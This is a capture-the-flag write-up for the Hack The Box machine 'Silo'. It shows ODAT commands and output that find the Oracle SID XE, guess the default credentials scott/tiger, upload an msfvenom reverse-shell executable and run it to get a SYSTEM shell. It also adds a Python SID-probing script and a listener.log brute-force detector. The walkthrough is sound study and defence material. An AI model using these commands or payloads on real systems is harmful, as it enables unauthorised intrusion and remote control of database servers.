Silo (Windows/Oracle)
https://qwertty.info/blog/htb-silo-writeup
Nmap Scan Result
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-time:
| date: 2022-01-21T19:57:57
|_ start_date: 2022-01-21T19:45:43
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required

HTTP serves only a blank default IIS page. Run gobuster against it, then move on to the Oracle TNS listener on port 1521, which is where the attack path of this box lies.
The exposed Oracle TNS listener (11.2.0.2.0 on port 1521) is where the attack path starts. Now we have to search for an existing exploit or tool that fits our case. After a while I found ODAT (Oracle Database Attacking Tool); its README.md lists a module for CVE-2012-1675 (TNS listener poisoning). So let's try this tool. First we have to clone the repo and change into its directory:
$ git clone https://github.com/quentinhardy/odat.git
$ cd odat
Now we can try the tnspoison module:
$ python3 odat.py tnspoison -s 10.10.10.82 --test-module
07:43:54 CRITICAL -: The server SID or Service Name must be given with the '-d SID' or '-n serviceName' option.
But we need the server SID (the instance identifier the listener routes connections by). Let's see how we can discover it. The help menu of odat.py shows a sidguesser module, which is exactly what we need: it tries a list of well-known SIDs against the listener, then falls back to a short brute force.
$ python3 odat.py sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
############################################################################################################### | ETA: 00:00:00
100% |###########################################################################################################| Time: 00:01:30
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###########################################################################################################| Time: 00:00:02
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ############################################################################## | ETA: 00:00:08
100% |###########################################################################################################| Time: 00:01:13
[+] SIDs found on the 10.10.10.82:1521 server: XE
And we got our SID: XE (as expected for an Oracle Express Edition instance, which always uses the SID XE).
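To show what the sidguesser run above actually does on the wire, here is an added example (not ODAT's code and not from the original writeup): it builds the TNS CONNECT packet that names a candidate SID and classifies the listener's reply by packet type, treating ACCEPT, REDIRECT and RESEND as "SID known" and a REFUSE carrying ORA-12505/12514 as "unknown". The fixed-field values in the CONNECT body are those of a typical Oracle client; the connect-data offset and length are computed from the body built here, so the packet is self-consistent. The `fake_listener` stand-in and the REFUSE packets it returns are constructed so the demo runs offline; `tcp_probe` is the live variant you would point at 10.10.10.82:1521.

```python
"""What `sidguesser` does on the wire: send a TNS CONNECT naming a candidate SID
and read the listener's verdict from the reply packet type.

Added example, not code from ODAT or from the writeup.  Fixed-field values in the
CONNECT body are those of a typical Oracle client; the connect-data offset and
length are computed from the body built here, so the packet is self-consistent.
The listener replies used offline below are constructed, not captured.
"""
import re
import socket
import struct
from typing import Callable, Iterable, List, Optional, Tuple

# TNS packet types (header byte 4)
TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT, TNS_RESEND = 1, 2, 4, 5, 11
HEADER_FMT = ">HHBBH"            # length, checksum, type, reserved, header checksum
FIXED_FMT = ">HHHHHHHHHHIBBII8s8s"
CD_OFFSET = struct.calcsize(HEADER_FMT) + struct.calcsize(FIXED_FMT)  # 58
VSNNUM = 0x0B200200              # version as the listener encodes it: 11.2.0.2.0


def build_connect(host: str, port: int, sid: str) -> bytes:
    """Return a complete TNS CONNECT packet asking the listener for `sid`."""
    cd = (f"(DESCRIPTION=(CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))"
          f"(ADDRESS=(PROTOCOL=tcp)(HOST={host})(PORT={port})))").encode()
    fixed = struct.pack(
        FIXED_FMT,
        0x0136, 0x012C,          # protocol version 310, lowest compatible 300
        0x0000, 0x0800, 0x7FFF,  # service options, SDU, TDU
        0x7F08, 0x0000, 0x0001,  # NT protocol characteristics, line turnaround, "value of one"
        len(cd), CD_OFFSET,      # where the listener finds the connect descriptor
        0, 0, 0,                 # max receivable connect data, connect flags 0/1
        0, 0,                    # trace cross-facility items
        b"\0" * 8, b"\0" * 8,    # trace unique connection id, reserved
    )
    header = struct.pack(HEADER_FMT, CD_OFFSET + len(cd), 0, TNS_CONNECT, 0, 0)
    return header + fixed + cd


def build_refuse(code: int) -> bytes:
    """Constructed listener REFUSE carrying ORA-<code>; body = reason(user), reason(system), length, text."""
    text = (f"(DESCRIPTION=(TMP=)(VSNNUM={VSNNUM})(ERR={code})"
            f"(ERROR_STACK=(ERROR=(CODE={code})(EMFI=4))))").encode()
    body = struct.pack(">BBH", 0x22, 0x00, len(text)) + text
    return struct.pack(HEADER_FMT, 8 + len(body), 0, TNS_REFUSE, 0, 0) + body


def classify_reply(packet: bytes) -> Tuple[str, Optional[int]]:
    """Map a raw reply to a CONNECT onto a SID verdict.

    ACCEPT, REDIRECT and RESEND all mean the listener recognised the SID and is
    handing the connection off (RESEND just asks for the CONNECT again).  A REFUSE
    carries the ORA error in its text: 12505 (unknown SID) and 12514 (unknown
    service name) are a wrong guess; any other code (e.g. 12518/12520, no handler
    available) is worth a second look rather than a definite miss.
    """
    if len(packet) < struct.calcsize(HEADER_FMT):
        raise ValueError("truncated TNS header")
    _len, _chk, ptype, _rsvd, _hchk = struct.unpack(HEADER_FMT, packet[:8])
    if ptype in (TNS_ACCEPT, TNS_REDIRECT, TNS_RESEND):
        return "accepted", None
    if ptype == TNS_REFUSE:
        _user, _sys, dlen = struct.unpack(">BBH", packet[8:12])
        m = re.search(r"\(ERR=(\d+)\)", packet[12:12 + dlen].decode(errors="replace"))
        code = int(m.group(1)) if m else None
        return ("refused" if code in (12505, 12514) else "other"), code
    return "other", None


def tcp_probe(host: str, port: int, sid: str, timeout: float = 5.0) -> bytes:
    """Live probe: one CONNECT per TCP connection, raw reply returned (not used offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connect(host, port, sid))
        return s.recv(4096)


def guess_sids(candidates: Iterable[str], probe: Callable[[str], bytes]) -> List[str]:
    """Return the candidates the listener accepts; `probe(sid)` supplies the raw reply."""
    return [sid for sid in candidates if classify_reply(probe(sid))[0] == "accepted"]


def fake_listener(known=("XE",)) -> Callable[[str], bytes]:
    """Constructed stand-in for the target: ACCEPT for known SIDs, REFUSE/ORA-12505 otherwise."""
    def probe(sid: str) -> bytes:
        if sid.upper() in known:
            return struct.pack(HEADER_FMT, 8, 0, TNS_ACCEPT, 0, 0)  # header alone is enough to classify
        return build_refuse(12505)
    return probe


if __name__ == "__main__":
    # Offline run against the fake listener; for the real target use
    # guess_sids(wordlist, lambda s: tcp_probe("10.10.10.82", 1521, s)).
    print(guess_sids(["ORCL", "PLSExtProc", "XE", "TEST"], fake_listener()))
```

Each guess costs one TCP connection and one REFUSE from the listener, which is why the two-character brute force above takes over a minute and why this activity is trivially visible in the listener's log.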
Now we can test the tnspoison module again. I always try to verify a vulnerability before running into a rabbit hole.
$ python3 odat.py tnspoison -s 10.10.10.82 -d XE --test-module
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
Yes, the listener reports as vulnerable. Note that the rest of this path does not actually exploit TNS poisoning; what follows relies on weak credentials instead. In the help menu of odat.py I saw the module passwordguesser. Maybe we can extract some credentials, now that we have the SID, which almost every module requires.
$ python3 odat.py passwordguesser -s 10.10.10.82 -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
....
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
Awesome! We found valid credentials, and they are the well-known default account scott/tiger. So maybe we are able to upload a reverse shell. There is a module named utlfile, which can upload, download and delete files on the database host. But first we have to create the reverse shell. I will use msfvenom for it:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > qwertty.exe
Now we can upload it with odat.py. Note the --sysdba flag: the file write here and the command execution below depend on the connection running as SYSDBA; without it the low-privileged scott account would not have the rights for this.
$ python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile c:/ qwertty.exe ../qwertty.exe
[1] (10.10.10.82:1521): Put the ../qwertty.exe local file in the c:/ folder like qwertty.exe on the 10.10.10.82 server
[+] The ../qwertty.exe file was created on the c:/ directory on the 10.10.10.82 server like the qwertty.exe file
Nice, the file was created on the box. Now let's start our nc listener on port 4444:
$ nc -lvnp 4444
Now we can use the module externaltable. It took me a while to discover this module because its name is not obvious for what we were looking for, but its description says exactly what we want: to read files or to execute system commands/scripts. Let's try it:
$ python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec c:/ qwertty.exe
[1] (10.10.10.82:1521): Execute the qwertty.exe command stored in the c:/ path
Hopefully we got the reverse shell. Let's check our nc listener:
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>
Nice! We got the shell, and it already runs as NT AUTHORITY\SYSTEM because the command was executed by the Oracle database process, which runs under that account on this host; no separate privilege escalation is needed. Now we can grab the user and root flags.
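From the defender's side, the sidguesser and passwordguesser runs above are loud: every CONNECT the listener refuses is written to its listener.log with the client address, the name that was tried and the return code (12505 for an unknown SID, 12514 for an unknown service name), and the two-character brute force alone produces hundreds of such records in about a minute. The following is an added detection example, not part of the writeup or of ODAT: it parses 11g-style text listener.log records, groups refusals per client address in a sliding time window, and reports any client that collected many refusals across several distinct names, together with the name that was eventually accepted. The log lines are constructed to mirror that layout, and the thresholds are assumptions to tune for your environment.

```python
"""Flag SID brute-forcing in an Oracle listener.log.

Added example (not from the writeup or ODAT).  The sample below is constructed in
the 11g text listener.log layout:
  <timestamp> * (CONNECT_DATA=...) * (ADDRESS=...) * establish * <sid> * <return code>
Return codes 12505 (unknown SID) and 12514 (unknown service name) are what a
sidguesser-style run leaves behind: many of them, from one client, within seconds.
"""
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

UNKNOWN_SID_CODES = {12505, 12514}

Event = namedtuple("Event", "ts client sid rc")
Finding = namedtuple("Finding", "client refusals sids_tried sids_accepted")

# Only 'establish' records carry a connect descriptor; service_update and the
# TNS-xxxxx continuation lines have a different shape and are skipped.
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Za-z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=(?P<cd>.*?)\) \* \(ADDRESS=(?P<addr>.*?)\) \* "
    r"establish \* (?P<svc>[^*]*?) \* (?P<rc>\d+)\s*$"
)


def parse_line(line):
    """Parse one 'establish' record into an Event, or return None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Take the client address from the ADDRESS field; the HOST inside CID is
    # client-supplied and trivially spoofed (ODAT sends __jdbc__).
    sid = re.search(r"\((?:SID|SERVICE_NAME)=([^)]*)\)", m["cd"])
    host = re.search(r"\(HOST=([^)]*)\)", m["addr"])
    ts = datetime.strptime(m["ts"].title(), "%d-%b-%Y %H:%M:%S")
    return Event(ts, host.group(1) if host else "?", sid.group(1) if sid else "", int(m["rc"]))


def detect_sid_bruteforce(lines, window=timedelta(seconds=120), min_refusals=5, min_distinct=3):
    """One Finding per client that, within `window`, collected at least `min_refusals`
    unknown-SID refusals spread over at least `min_distinct` distinct names.  Any rc=0
    establish from that client in the same window is reported as the guess that landed."""
    by_client = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_client[ev.client].append(ev)
    findings = []
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end, ev in enumerate(evs):
            while ev.ts - evs[start].ts > window:
                start += 1
            refused = [e for e in evs[start:end + 1] if e.rc in UNKNOWN_SID_CODES]
            if len(refused) >= min_refusals and len({e.sid for e in refused}) >= min_distinct:
                # Threshold crossed: report the full window from its first event,
                # so a success that follows the refusals is included.
                cutoff = evs[start].ts + window
                win = [e for e in evs[start:] if e.ts <= cutoff]
                refused = [e for e in win if e.rc in UNKNOWN_SID_CODES]
                findings.append(Finding(client, len(refused),
                                        sorted({e.sid for e in refused}),
                                        sorted({e.sid for e in win if e.rc == 0})))
                break
    return findings


# Constructed sample: one legitimate client (10.10.10.50) and one guessing run from
# 10.10.14.3 that ends with the correct SID.
SAMPLE_LOG = """\
21-JAN-2022 19:50:01 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc_app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=50122)) * establish * XE * 0
21-JAN-2022 19:50:05 * service_update * XE * 0
21-JAN-2022 19:50:10 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=51234)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JAN-2022 19:50:10 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=51235)) * establish * TEST * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JAN-2022 19:50:11 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=51236)) * establish * PROD * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JAN-2022 19:50:11 * (CONNECT_DATA=(SID=DEV)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=51237)) * establish * DEV * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JAN-2022 19:50:12 * (CONNECT_DATA=(SERVICE_NAME=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=51238)) * establish * ORCL * 12514
TNS-12514: TNS:listener does not currently know of service requested in connect descriptor
21-JAN-2022 19:50:12 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=51239)) * establish * XE * 0
21-JAN-2022 19:55:30 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc_app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=50140)) * establish * XE * 0
"""

if __name__ == "__main__":
    for f in detect_sid_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{f.client}: {f.refusals} unknown-SID refusals, tried {f.sids_tried}, accepted {f.sids_accepted}")
```

The same per-client grouping extends to the passwordguesser step, except that failed logins (ORA-01017) are not in listener.log; they appear in the database audit trail or alert log, so the two sources need to be correlated on client address and time.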
----
Odat installation
Initially I couldn't convert the rpm to deb as the instructions describe, and found this post helpful: https://askubuntu.com/questions/215624/alien-cannot-built-package-for-architecture-ubuntu-amd64
